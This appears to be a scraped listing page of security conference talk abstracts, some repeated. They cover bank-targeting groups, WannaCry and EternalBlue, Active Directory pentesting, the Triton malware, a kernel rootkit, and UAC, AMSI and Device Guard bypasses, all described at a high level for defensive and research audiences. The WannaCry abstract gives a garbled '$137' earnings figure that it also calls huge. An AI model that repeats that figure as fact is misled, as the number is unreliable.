The document discusses targeted attacks on financial institutions. It provides information on:
1) Known targeted attackers like Cobalt, Corkow, and Anunak and their favorite targets like ATMs, card processing, and SWIFT systems.
2) Future targeted attackers that may go after financial networks.
3) The common targets of these attacks, which include corporate internet banking software, payment gateways, ATMs, trade terminals, and SWIFT/ARM CBR systems.
4) The malware delivery methods used by these groups, such as driveby downloads, pay-per-install, web hacks, phishing emails, and spear phishing.
Ник Белогорский - Будни Кремниевой Долины. История карьеры Ника, борьба с хак...HackIT Ukraine
Ник расскажет про типичный день антивирусного специалиста в Кремниевой Долине. Про то, как компании борются с хакерскими атаками. Он расскажет свою историю про то, как работал в Фейсбуке, как туда попасть и какой опыт эта компания даёт. Расскажет про Cyphort, и антивирусы нового поколения. И он поделится новыми трендами кибербезопасности.
Заполучили права администратора домена? Игра еще не оконченаPositive Hack Days
Получение прав администратора домена не всегда означает, что сразу появляется доступ ко всем хостам, общим ресурсам или базам данных сети. Хитрость в том, чтобы найти нужный аккаунт. Докладчик приведет примеры различных сценариев внутреннего тестирования на проникновение, расскажет о сложностях, с которыми столкнулась его команда и о том, как разрабатывался инструмент, позволивший справиться с ними.
Breaking the cyber kill chain! This slide was presented in securITy – information security conference digital world 2017. This talk is about proactive security and threat hunting.
Andrea Lelli, Microsoft
My presentation will trace the end-to-end WannaCrypt (also known as WannaCry) attack. I will start with an analysis of the underlying SMBv1 remote code execution kernel-mode exploit dubbed "Eternalblue", a powerful cyberweapon leaked by a hacker group known as "The Shadow Brokers".
I will then describe how the Wannacrypt ransomware works, and show how the cybercriminals leveraged the EternalBlue exploit to spread the ransomware and achieve a massive and unprecedented infection rate, leaving hundreds of thousands of machines affected. I will highlight the Windows 10 kernel mitigations that granted the OS immunity from the attack.
I will also focus on some interesting characteristics that make WannaCrypt particularly sophisticated, like the file-wiping and space-consuming capabilities designed to make the recovery of the original files nearly impossible.
I will conclude with a look into how much the perpetrators might have likely earned from the attack. An analysis of the Bitcoin transactions shows that the cybercriminals pooled around $137 dollars to date, which is a huge amount of money, but doesn’t seem to scale with the extent of infection. Not to mention, Bitcoin is a double-edged sword and there’s a good chance that the cybercriminals may not be able to cash out a dime. In this section I will also mention some copycat malware that tried to spread using the same SMB vulnerability (e.g. NotPetya).
I will end the presentation with advice on preventing, detecting, and responding to ransomware attacks.
Carlos García - Pentesting Active Directory [rooted2018]RootedCON
Introducción a las pruebas de intrusión en entornos Microsoft Active Directory en forma de ponencia práctica para auditores o personas interesadas en el pentesting en entornos corporativos. Se dará una breve introducción al servicio de directorio Active Directory y sus componentes más críticos desde el punto de vista de la seguridad.Posteriormente, se explicarán las principales diferencias con respecto a un pentesting clásico de infraestructura, así como las técnicas y ataques más comunes para llevar a cabo el ejercicio y comprometer completamente el dominio corporativo.Requisitos: Se recomienda que los asistentes tengan conocimientos básicos de Active Directory y básicos/medios de pentesting o hacking ético, preferiblemente en infraestructuras y/o Sistemas Operativos.
Ник Белогорский - Будни Кремниевой Долины. История карьеры Ника, борьба с хак...HackIT Ukraine
Ник расскажет про типичный день антивирусного специалиста в Кремниевой Долине. Про то, как компании борются с хакерскими атаками. Он расскажет свою историю про то, как работал в Фейсбуке, как туда попасть и какой опыт эта компания даёт. Расскажет про Cyphort, и антивирусы нового поколения. И он поделится новыми трендами кибербезопасности.
Заполучили права администратора домена? Игра еще не оконченаPositive Hack Days
Получение прав администратора домена не всегда означает, что сразу появляется доступ ко всем хостам, общим ресурсам или базам данных сети. Хитрость в том, чтобы найти нужный аккаунт. Докладчик приведет примеры различных сценариев внутреннего тестирования на проникновение, расскажет о сложностях, с которыми столкнулась его команда и о том, как разрабатывался инструмент, позволивший справиться с ними.
Breaking the cyber kill chain! This slide was presented in securITy – information security conference digital world 2017. This talk is about proactive security and threat hunting.
Andrea Lelli, Microsoft
My presentation will trace the end-to-end WannaCrypt (also known as WannaCry) attack. I will start with an analysis of the underlying SMBv1 remote code execution kernel-mode exploit dubbed "Eternalblue", a powerful cyberweapon leaked by a hacker group known as "The Shadow Brokers".
I will then describe how the Wannacrypt ransomware works, and show how the cybercriminals leveraged the EternalBlue exploit to spread the ransomware and achieve a massive and unprecedented infection rate, leaving hundreds of thousands of machines affected. I will highlight the Windows 10 kernel mitigations that granted the OS immunity from the attack.
I will also focus on some interesting characteristics that make WannaCrypt particularly sophisticated, like the file-wiping and space-consuming capabilities designed to make the recovery of the original files nearly impossible.
I will conclude with a look into how much the perpetrators might have likely earned from the attack. An analysis of the Bitcoin transactions shows that the cybercriminals pooled around $137 dollars to date, which is a huge amount of money, but doesn’t seem to scale with the extent of infection. Not to mention, Bitcoin is a double-edged sword and there’s a good chance that the cybercriminals may not be able to cash out a dime. In this section I will also mention some copycat malware that tried to spread using the same SMB vulnerability (e.g. NotPetya).
I will end the presentation with advice on preventing, detecting, and responding to ransomware attacks.
Carlos García - Pentesting Active Directory [rooted2018]RootedCON
Introducción a las pruebas de intrusión en entornos Microsoft Active Directory en forma de ponencia práctica para auditores o personas interesadas en el pentesting en entornos corporativos. Se dará una breve introducción al servicio de directorio Active Directory y sus componentes más críticos desde el punto de vista de la seguridad.Posteriormente, se explicarán las principales diferencias con respecto a un pentesting clásico de infraestructura, así como las técnicas y ataques más comunes para llevar a cabo el ejercicio y comprometer completamente el dominio corporativo.Requisitos: Se recomienda que los asistentes tengan conocimientos básicos de Active Directory y básicos/medios de pentesting o hacking ético, preferiblemente en infraestructuras y/o Sistemas Operativos.
Serão demonstradas diversas técnicas de ataque, tais como: Injeções de codigos,brute force, backdoors, root kits, exploits e várias outras maneiras para acessar e se manter indevidamente a servidores,em contra-partida são discutidas melhores praticas para se
evitar os tipos de ataques citados. (Palestra realizada no 3º Festival de Software livre em belo horizonte - FSLBH)
Kymberlee Price and Sam Vaughan, Microsoft
Many developers today are turning to well established third-party open source components and libraries to speed the development process and realize quality improvements over creating an in-house proprietary font parsing or image rendering library from the ground up. Efficiency comes at a cost though: a single OSS component may have multiple additional OSS subcomponents, and an application or service may have dozens of different third party libraries implemented. The result is that third-party and open source libraries have the ability to spread a single vulnerability across multiple products - exposing enterprises and requiring software vendors and IT organizations to patch the same vulnerability repeatedly. This presentation will dive deep into vulnerability data and explore the source and spread of OSS vulnerabilities through products – as well as actions developers, the security research community, and enterprise customers can take to address this problem.
TRITON: The Next Generation of ICS MalwareThomas Roccia
This presentation is about the industrial malware dubbed Triton that targeted Safety Industrial System in a oil and gas plant in 2017. It was presented during the CNES COMET event about Industrial Threats.
Saruhan Karademir, Microsoft
David Weston, Microsoft
Windows Defender Application Guard (WDAG) brings the next generation isolation into the browser space. It merges the best of Hyper-V virtualization and Microsoft Edge sandboxing technologies to bring hardware-enforced isolation of untrusted websites from the user’s data and operating system. In this talk, we will walk through the WDAG security promise and architecture. We will explain how it was built from the ground up with security as the number one priority showcasing the architectural decisions that added layers of defense. Finally, we explore how Microsoft’s internal security teams engaged from the very beginning of this feature’s development, helping shape WDAG’s design, finding and fixing critical vulnerabilities, and building additional defense-in-depth layers before the product reached a single customer.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
In many targeted attack cases, once the attacker gains entry into the network, malware infection will spread laterally. In incident responses, investigating this lateral movement activity is very important. Methods for investigating lateral movement include log analysis of infected hosts and forensic analysis of disk images. However, in many cases, useful logs for incident investigation are not recorded in infected hosts, making it difficult to trace the attackers' behavior. This often results in not being able to get a clear picture of how the infection spreads across the network.
Therefore, we conducted investigation on attackers' C2 servers and malware to gain insight into their actives. By decoding the malware's communication logs and C2 server logs, we were able to understand the attackers’ activity after the network intrusion. We also found common patterns in how infection spread laterally. Also, even in different campaigns with different malware deployed, many common tools were used by attackers.
Taking advantage of the similarity, we figured that tracking these tools is effective in understanding lateral movements. In Windows PCs, which are the main target of APT attacks, certain
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
«Cybercrime» является особым направлением в области компьютерной безопасности и приватности. Это направление объединяет научные работы, которые исследуют различные сценарии атак или мошенничества, анализируют вредоносные экосистемы, обнаруживают злоумышленников и изучает их методы с целью разработки эффективных мер противодействия. В текущем докладе будут предоставлены рекомендации о том, как проводить киберрасследования, основываясь на примерах из наших работ и статей. Например, я расскажу о нашем масштабном исследовании вредоносных веб-оболочек и как мы смогли обнаружить жертв и нападающих по всему земному шару, а так же о том, как мы использовали навыки социальной инженерии, чтобы исследовать экосистему мошеннической технической поддержки, и многое другое. Моя цель состоит в том, чтобы заинтересовать научных исследователей и других представителей области ИБ в работе по направлению “Cybercrime”, в поиске различных путей предотвращения и расследования киберпреступлений. А также, показать, что подобные полезные исследования не всегда требует огромных ресурсов и сотрудничеств. Формат доклада: разговор в виде легкого семинара с элементами коллективного мозгового штурма (ноутбук не требуется). Мы рассмотрим 3 урока, из каждого выделяя полезные методы, инструменты и навыки. Язык: русский (с элементами английского).
International collaborative efforts to share threat data in a vetted member c...CODE BLUE
The APWG has been sharing threat data for over 12 years to help protect organizations and the all internet users against cyber threats. Initially founded to focus on the phishing, as the threat landscape on the internet has grown so has APWG. Today our vetted member community shares information to fight cybercrime and fraud not only on phishing but numerous other types of threat data including malicious IP addresses and ransomware information. This session will look at the history of sharing these types of data, how sharing has changed over the years and the necessity to automate these process.
Matt Oh, Microsoft
We are seeing new technique used everyday by malware. But, it is very hard to find any impressive techniques used in the wild. Recently there was huge buzz about Detrahere malware which used internally known issues with certificate signing in Windows 10 kernel driver. Even though the certificate check bypass technique itself is very interesting, also I found that the tactics used by the malware is more impressive. Even though the malware is mainly focused on Ad-hijacking functionality through Netfilter driver installation, but it also has rootkit ability through file system driver hooking. This feels like old days coming back with various new arsenals. The rootkit detects kernel debugging settings and will destroy the system when it finds one. The unpacking process can be very challenging job, too as it uses kernel driver image hollowing technique (something similar to process hollowing) to deobfuscate itself and run unpacked code. Our patchguard doesn't seem like triggering on this action, because all the sections are pre-allocated with execute permission already.
Through this talk, I want to present various techniques used by this malware focusing on the kernel level obfuscation and anti-analysis tactics. This will give us new insights on how new Windows rootkit malware might look like in the future and how detecting them from security systems and detonation systems can be a challenge.
Chaz Lever, Georgia Institute of Technology
Both the operational and academic security communities have used dynamic analysis sandboxes to execute malware samples for roughly a decade. Network information derived from dynamic analysis is frequently used for threat detection, network policy, and incident response. Despite these common and important use cases, the efficacy of the network detection signal derived from such analysis has yet to be studied in depth. This paper seeks to address this gap by analyzing the network communications of 26.8 million samples that were collected over a period of five years.
Using several malware and network datasets, our large-scale study makes three core contributions. (1) We show that dynamic analysis traces should be carefully curated and provide a rigorous methodology that analysts can use to remove potential noise from such traces. (2) We show that Internet miscreants are increasingly using potentially unwanted programs (PUPs) that rely on a surprisingly stable DNS and IP infrastructure. This indicates that the security community is in need of better protections against such threats, and network policies may provide a solid foundation for such protections. (3) Finally, we see that, for the vast majority of malware samples, network traffic provides the earliest indicator of infection—several weeks and often months before the malware sample is discovered. Therefore, network defenders should rely on automated malware analysis to extract indicators of compromise and not to build early detection systems.
Matt Nelson, SpecterOps
A persistent "enlightened" attacker will invest the required resources to bypass any and all security features that might stand between them and their objective, regardless if these features are guaranteed to be serviced as security boundaries or not. This includes researching and developing attacks against Windows security features that may impose a hurdle in their attack chain. This talk will outline recent research into features such as User Account Control (UAC), the Antimalware Scan Interface (AMSI) and Device Guard and how these bypasses are useful to attackers in an operational context.
Some examples include:
UAC: If an attacker compromises a user that is running as a split-token administrator, bypassing UAC is required in order to perform any administrative actions; such as dumping credentials from memory.
AMSI: With in-memory attacks becoming more prevalent via scripting languages, AMSI is the next logical step to facilitate detection. An attacker will need to bypass AMSI in order to safely operate in memory when using PowerShell, VBScript, or JScript.
Device Guard: As organizations begin to consider whitelisting solutions, an attacker is required to adapt and develop a bypass to these technologies. One such solution is Device Guard, which can be used to heavily restrict what is allowed to execute on the system. In order to accomplish their objective, an attacker would need to bypass User Mode Code Integrity (UMCI). Such research can find novel ways to execute code in ways that are not likely to be detected.
I will also cover some of the fixes that have been implemented in newer versions of the Windows Operating System. Fixing these bypasses will not only make Windows safer, but it will begin to disrupt attackers by raising the cost associated with successfully executing an attack.
Ведущий: Терренс Гаро
В докладе рассказывается о том, как создать ханипот (ловушку) и организовать сервис с обновляемыми данными о попавшихся DDoS-ботах с помощью Kibana, Elasticsearch, Logstash и AMQP. Докладчик откроет исходный код системы мониторинга и сбора внешней статистики DDoS-атак, над которой он работал со своей командой последние два года.
Hacking Exposed LIVE: Attacking in the ShadowsPriyanka Aash
Attackers have found compromise trivial for decades. But as additional security layers get deployed and next generation solutions come to market, attackers are turning to old and new techniques for bypassing security controls to launch their attacks and stay hidden. This session will explore the latest techniques and how simple defense techniques can foil even the most sophisticated attacks.
(Source: RSA USA 2016-San Francisco)
Over the past few years Eric has shown that telecom fraud is a growing problem, and basic fixes for protecting your (and your customers) PBX. This time he will show the basic configuration considerations that you can take to protect a PBX. Come to this session to find out: Who is out there looking to attack your PBX? How do they find it? How can you protect your PBX?
Serão demonstradas diversas técnicas de ataque, tais como: Injeções de codigos,brute force, backdoors, root kits, exploits e várias outras maneiras para acessar e se manter indevidamente a servidores,em contra-partida são discutidas melhores praticas para se
evitar os tipos de ataques citados. (Palestra realizada no 3º Festival de Software livre em belo horizonte - FSLBH)
Kymberlee Price and Sam Vaughan, Microsoft
Many developers today are turning to well established third-party open source components and libraries to speed the development process and realize quality improvements over creating an in-house proprietary font parsing or image rendering library from the ground up. Efficiency comes at a cost though: a single OSS component may have multiple additional OSS subcomponents, and an application or service may have dozens of different third party libraries implemented. The result is that third-party and open source libraries have the ability to spread a single vulnerability across multiple products - exposing enterprises and requiring software vendors and IT organizations to patch the same vulnerability repeatedly. This presentation will dive deep into vulnerability data and explore the source and spread of OSS vulnerabilities through products – as well as actions developers, the security research community, and enterprise customers can take to address this problem.
TRITON: The Next Generation of ICS MalwareThomas Roccia
This presentation is about the industrial malware dubbed Triton that targeted Safety Industrial System in a oil and gas plant in 2017. It was presented during the CNES COMET event about Industrial Threats.
Saruhan Karademir, Microsoft
David Weston, Microsoft
Windows Defender Application Guard (WDAG) brings the next generation isolation into the browser space. It merges the best of Hyper-V virtualization and Microsoft Edge sandboxing technologies to bring hardware-enforced isolation of untrusted websites from the user’s data and operating system. In this talk, we will walk through the WDAG security promise and architecture. We will explain how it was built from the ground up with security as the number one priority showcasing the architectural decisions that added layers of defense. Finally, we explore how Microsoft’s internal security teams engaged from the very beginning of this feature’s development, helping shape WDAG’s design, finding and fixing critical vulnerabilities, and building additional defense-in-depth layers before the product reached a single customer.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
In many targeted attack cases, once the attacker gains entry into the network, malware infection will spread laterally. In incident responses, investigating this lateral movement activity is very important. Methods for investigating lateral movement include log analysis of infected hosts and forensic analysis of disk images. However, in many cases, useful logs for incident investigation are not recorded in infected hosts, making it difficult to trace the attackers' behavior. This often results in not being able to get a clear picture of how the infection spreads across the network.
Therefore, we conducted investigation on attackers' C2 servers and malware to gain insight into their actives. By decoding the malware's communication logs and C2 server logs, we were able to understand the attackers’ activity after the network intrusion. We also found common patterns in how infection spread laterally. Also, even in different campaigns with different malware deployed, many common tools were used by attackers.
Taking advantage of the similarity, we figured that tracking these tools is effective in understanding lateral movements. In Windows PCs, which are the main target of APT attacks, certain
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
«Cybercrime» является особым направлением в области компьютерной безопасности и приватности. Это направление объединяет научные работы, которые исследуют различные сценарии атак или мошенничества, анализируют вредоносные экосистемы, обнаруживают злоумышленников и изучает их методы с целью разработки эффективных мер противодействия. В текущем докладе будут предоставлены рекомендации о том, как проводить киберрасследования, основываясь на примерах из наших работ и статей. Например, я расскажу о нашем масштабном исследовании вредоносных веб-оболочек и как мы смогли обнаружить жертв и нападающих по всему земному шару, а так же о том, как мы использовали навыки социальной инженерии, чтобы исследовать экосистему мошеннической технической поддержки, и многое другое. Моя цель состоит в том, чтобы заинтересовать научных исследователей и других представителей области ИБ в работе по направлению “Cybercrime”, в поиске различных путей предотвращения и расследования киберпреступлений. А также, показать, что подобные полезные исследования не всегда требует огромных ресурсов и сотрудничеств. Формат доклада: разговор в виде легкого семинара с элементами коллективного мозгового штурма (ноутбук не требуется). Мы рассмотрим 3 урока, из каждого выделяя полезные методы, инструменты и навыки. Язык: русский (с элементами английского).
International collaborative efforts to share threat data in a vetted member c...CODE BLUE
The APWG has been sharing threat data for over 12 years to help protect organizations and the all internet users against cyber threats. Initially founded to focus on the phishing, as the threat landscape on the internet has grown so has APWG. Today our vetted member community shares information to fight cybercrime and fraud not only on phishing but numerous other types of threat data including malicious IP addresses and ransomware information. This session will look at the history of sharing these types of data, how sharing has changed over the years and the necessity to automate these process.
Matt Oh, Microsoft
We are seeing new technique used everyday by malware. But, it is very hard to find any impressive techniques used in the wild. Recently there was huge buzz about Detrahere malware which used internally known issues with certificate signing in Windows 10 kernel driver. Even though the certificate check bypass technique itself is very interesting, also I found that the tactics used by the malware is more impressive. Even though the malware is mainly focused on Ad-hijacking functionality through Netfilter driver installation, but it also has rootkit ability through file system driver hooking. This feels like old days coming back with various new arsenals. The rootkit detects kernel debugging settings and will destroy the system when it finds one. The unpacking process can be very challenging job, too as it uses kernel driver image hollowing technique (something similar to process hollowing) to deobfuscate itself and run unpacked code. Our patchguard doesn't seem like triggering on this action, because all the sections are pre-allocated with execute permission already.
Through this talk, I want to present various techniques used by this malware focusing on the kernel level obfuscation and anti-analysis tactics. This will give us new insights on how new Windows rootkit malware might look like in the future and how detecting them from security systems and detonation systems can be a challenge.
Chaz Lever, Georgia Institute of Technology
Both the operational and academic security communities have used dynamic analysis sandboxes to execute malware samples for roughly a decade. Network information derived from dynamic analysis is frequently used for threat detection, network policy, and incident response. Despite these common and important use cases, the efficacy of the network detection signal derived from such analysis has yet to be studied in depth. This paper seeks to address this gap by analyzing the network communications of 26.8 million samples that were collected over a period of five years.
Using several malware and network datasets, our large-scale study makes three core contributions. (1) We show that dynamic analysis traces should be carefully curated and provide a rigorous methodology that analysts can use to remove potential noise from such traces. (2) We show that Internet miscreants are increasingly using potentially unwanted programs (PUPs) that rely on a surprisingly stable DNS and IP infrastructure. This indicates that the security community is in need of better protections against such threats, and network policies may provide a solid foundation for such protections. (3) Finally, we see that, for the vast majority of malware samples, network traffic provides the earliest indicator of infection—several weeks and often months before the malware sample is discovered. Therefore, network defenders should rely on automated malware analysis to extract indicators of compromise and not to build early detection systems.
Matt Nelson, SpecterOps
A persistent "enlightened" attacker will invest the required resources to bypass any and all security features that might stand between them and their objective, regardless if these features are guaranteed to be serviced as security boundaries or not. This includes researching and developing attacks against Windows security features that may impose a hurdle in their attack chain. This talk will outline recent research into features such as User Account Control (UAC), the Antimalware Scan Interface (AMSI) and Device Guard and how these bypasses are useful to attackers in an operational context.
Some examples include:
UAC: If an attacker compromises a user that is running as a split-token administrator, bypassing UAC is required in order to perform any administrative actions; such as dumping credentials from memory.
AMSI: With in-memory attacks becoming more prevalent via scripting languages, AMSI is the next logical step to facilitate detection. An attacker will need to bypass AMSI in order to safely operate in memory when using PowerShell, VBScript, or JScript.
Device Guard: As organizations begin to consider whitelisting solutions, an attacker is required to adapt and develop a bypass to these technologies. One such solution is Device Guard, which can be used to heavily restrict what is allowed to execute on the system. In order to accomplish their objective, an attacker would need to bypass User Mode Code Integrity (UMCI). Such research can find novel ways to execute code in ways that are not likely to be detected.
I will also cover some of the fixes that have been implemented in newer versions of the Windows Operating System. Fixing these bypasses will not only make Windows safer, but it will begin to disrupt attackers by raising the cost associated with successfully executing an attack.
Ведущий: Терренс Гаро
В докладе рассказывается о том, как создать ханипот (ловушку) и организовать сервис с обновляемыми данными о попавшихся DDoS-ботах с помощью Kibana, Elasticsearch, Logstash и AMQP. Докладчик откроет исходный код системы мониторинга и сбора внешней статистики DDoS-атак, над которой он работал со своей командой последние два года.
Hacking Exposed LIVE: Attacking in the ShadowsPriyanka Aash
Attackers have found compromise trivial for decades. But as additional security layers get deployed and next generation solutions come to market, attackers are turning to old and new techniques for bypassing security controls to launch their attacks and stay hidden. This session will explore the latest techniques and how simple defense techniques can foil even the most sophisticated attacks.
(Source: RSA USA 2016-San Francisco)
Over the past few years Eric has shown that telecom fraud is a growing problem, and basic fixes for protecting your (and your customers) PBX. This time he will show the basic configuration considerations that you can take to protect a PBX. Come to this session to find out: Who is out there looking to attack your PBX? How do they find it? How can you protect your PBX?
For organizations and individuals with limited security budgets, successfully hunting for cyber adversaries can be a daunting challenge. Threat Intelligence can be expensive and sometimes
nothing more than IoCs or blacklists. In this talk, Endgame’s threat research team will present a series of techniques that can enable organizations to leverage free or almost-free sources of
data and open-source tools to “hunt on the cheap.” They’ll explain how to: retrieve attackers’ tools from globally distributed honeynets that look like your organization or a juicy launching
point to attackers; enrich the data past basic file/tool hashes to identify malicious command and control IPs/domains through automated binary analysis using open-source sandboxes and tools; and use passive DNS data to identify active infections and enrich existing data sets. Attendees will learn how to apply these three techniques to hunt for adversaries within their own
networks. They will also learn about the various open-source solutions available, such as graph databases, that make these techniques inexpensive and within the scope of many organizations.
Anjum Ahuja, Senior Threat Researcher, Endgame
Jamie Butler, Chief Scientist, Endgame
Andrew Morris, Threat Researcher, Endgame
The personal and financial information of approximately 110 million Americans, comprising 11 GB of data, was stolen in a successful compromise of a retail giant during the 2013 Christmas shopping season. Equally concerning is that the attackers persisted – undetected – for as long as two weeks before the breach was discovered. What can retailers and other enterprises learn from this event? Join IBM Security experts on Wednesday, February 19th where we will share details on the anatomy of this breach and recommended steps to protect you against similar attacks.
View the full on-demand webcast: https://www2.gotomeeting.com/register/537536362
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Ransomware has become one of the most widespread and damaging threats that internet users face. Since the infamous CryptoLocker first appeared in 2013, we’ve seen a new era of file-encrypting ransomware variants delivered through spam messages and Exploit Kits, extorting money from home users and businesses alike.
Ransomware webinar may 2016 final version externalZscaler
In the last few years, ransomware has taken the cybercrime world by storm. CryptoWall 3.0, one of the most lucrative and broad-reaching ransomware campaigns, was alone responsible for 406,887 infection attempts and accounted for about $325 million in damages in 2015.1 And, according to the Institute for Critical Infrastructure Technology, ransomware promises to wreak more havoc in 2016.
While individual users were once the preferred target of ransomware, perpetrators have increasingly set their sights on businesses and organizations. And you can bet that with larger targets, the ransom demands will increase accordingly.
Are you prepared for such an attack?
In this presentaiton we will highlight how ransomware can impact your business and why legacy security solutions don’t stand a chance against such threats.
This talk revisits the 2016 Mirai attack which targeted IoT devices including IP cameras, WiFi-connected refrigerators, home routers, and more. The resulting botnet was used to attack Dyn’s DNS platform, which affected many websites including Twitter, SoundCloud, Airbnb, and Spotify.
You will learn and discuss the answers to these questions and more:
• What is the current state of Mirai and Mirai variants?
• What Distributed Denial of Service (DDoS) defenses do you have in place?
• How can you prepare to detect and defend against them botnet malware?
• What is recommended in the September 2018 NISTIR Draft,
Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks.
Browser isolation (isc)2 may presentation v2Wen-Pai Lu
Browser isolation provides protection for your devices from malware, phishing and many other web-based attacks. The air gaps between your browser and the devices you're on isolate all your browser activities from being affected your devices, thus protect you from malicious attacks.
Currently I'm working in company with millions of customers in very complex and diversified business environment. EC companies, like Rakuten Inc., always under pressure of massive targeted and untargeted attacks onto their customers. Different possibilities of accounts monetization attracts fraudsters, and increases level of risks. This is a common problem for current internet giants.
I want to explain how, we have built large scale fraud prevention system, which can protect customers on different levels of company ecosystem. Step by step I will explain how you can add additional levels of protection, to survive under constant attacks. I want to show how to mitigate some challenges related to reliability and reaction time. And how combination of different technics, including machine learning, can improve detection quality.
All this challenges I want to discuss in context of huge company with variety of absolutely different services for desktop and mobile. I will try to show that it’s possible to make system, which will effectively protect customers, and not impact conversion rate at the same time.
I also want to cover some aspects of measurement of fraud prevention KPIs, and economical aspects of fraud prevention.
Ransomware: How to avoid a crypto crisis at your IT businessCalyptix Security
Cryptolocker and other ransomware brought crisis to thousands of businesses last year. The malware made millions by encrypting victims’ files and demanding ransoms to unlock them. Some companies lost everything. Others, including local police departments, had to pay a hefty ransom to recover their data.
Today, Cryptolocker is gone, but ransomware is growing stronger. New variants such as CryptoWall and Critroni are infecting users, locking their files, and demanding higher ransoms. How can you protect your IT business and clients from this growing threat?
Join Calyptix Security for a conversation on crypto-ransomware, where it’s headed, and how to avoid a ‘crypto crisis’ at your office. You’ll get straight-forward advice on how to stop this threat from impacting your business network security and clients.
Video recording of this webinar took place on March 12, 2015
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
1. Основные понятия и определения: продукт, пакет, связи между ними.
2. Как узнать, какие изменения произошли в продукте?
3. Проблемы changelog и release note.
4. Решение: инструмент ChangelogBuilder для автоматической подготовки Release Notes
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
1. Обзор Windows Docker (кратко)
2. Как мы построили систему билда приложений в Docker (Visual Studio\Mongo\Posgresql\etc)
3. Примеры Dockerfile (выложенные на github)
4. Отличия процессов DockerWindows от DockerLinux (Долгий билд, баги, remote-регистр.)
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
1. Проблемы в построении CI процессов в компании
2. Структура типовой сборки
3. Пример реализации типовой сборки
4. Плюсы и минусы от использования типовой сборки
1. Что такое BI. Зачем он нужен.
2. Что такое Qlik View / Sense
3. Способ интеграции. Как это работает.
4. Метрики, KPI, планирование ресурсов команд, ретроспектива релиза продукта, тренды.
5. Подключение внешних источников данных (Excel, БД СКУД, переговорные комнаты).
Approof — статический анализатор кода для проверки веб-приложений на наличие уязвимых компонентов. В своей работе анализатор основывается на правилах, хранящих сигнатуры искомых компонентов. В докладе рассматривается базовая структура правила для Approof и процесс автоматизации его создания.
Задумывались ли вы когда-нибудь о том, как устроены современные механизмы защиты приложений? Какая теория стоит за реализацией WAF и SAST? Каковы пределы их возможностей? Насколько их можно подвинуть за счет более широкого взгляда на проблематику безопасности приложений?
На мастер-классе будут рассмотрены основные методы и алгоритмы двух основополагающих технологий защиты приложений — межсетевого экранирования уровня приложения и статического анализа кода. На примерах конкретных инструментов с открытым исходным кодом, разработанных специально для этого мастер-класса, будут рассмотрены проблемы, возникающие на пути у разработчиков средств защиты приложений, и возможные пути их решения, а также даны ответы на все упомянутые вопросы.
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
Разработка наукоемкого программного обеспечения отличается тем, что нет ни четкой постановки задачи, ни понимания, что получится в результате. Однако даже этом надо программировать то, что надо, и как надо. Докладчик расскажет о том, как ее команда успешно разработала и вывела в промышленную эксплуатацию несколько наукоемких продуктов, пройдя непростой путь от эксперимента, результатом которого был прототип, до промышленных версий, которые успешно продаются как на российском, так и на зарубежном рынках. Этот путь был насыщен сложностями и качественными управленческими решениями, которыми поделится докладчик
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
Немногие разработчики закладывают безопасность в архитектуру приложения на этапе проектирования. Часто для этого нет ни денег, ни времени. Еще меньше — понимания моделей нарушителя и моделей угроз. Защита приложения выходит на передний план, когда уязвимости начинают стоить денег. К этому времени приложение уже работает и внесение существенных изменений в код становится нелегкой задачей.
К счастью, разработчики тоже люди, и в коде разных приложений можно встретить однотипные недостатки. В докладе речь пойдет об опасных ошибках, которые чаще всего допускают разработчики Android-приложений. Затрагиваются особенности ОС Android, приводятся примеры реальных приложений и уязвимостей в них, описываются способы устранения.
Разработка любого софта так или иначе базируется на требованиях. Полный перечень составляют бизнес-цели приложения, различные ограничения и ожидания по качеству (их еще называют NFR). Требования к безопасности ПО относятся к последнему пункту. В ходе доклада будут рассматриваться появление этих требований, управление ими и выбор наиболее важных.
Отдельно будут освещены принципы построения архитектуры приложения, при наличии таких требований и без, и продемонстрировано, как современные (и хорошо известные) подходы к проектированию приложения помогают лучше строить архитектуру приложения для минимизации ландшафта угроз.
Доклад посвящен разработке корректного программного обеспечения с применением одного из видов статического анализа кода. Будут освещены вопросы применения подобных методов, их слабые стороны и ограничения, а также рассмотрены результаты, которые они могут дать. На конкретных примерах будет продемонстрировано, как выглядят разработка спецификаций для кода на языке Си и доказательство соответствия кода спецификациям.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
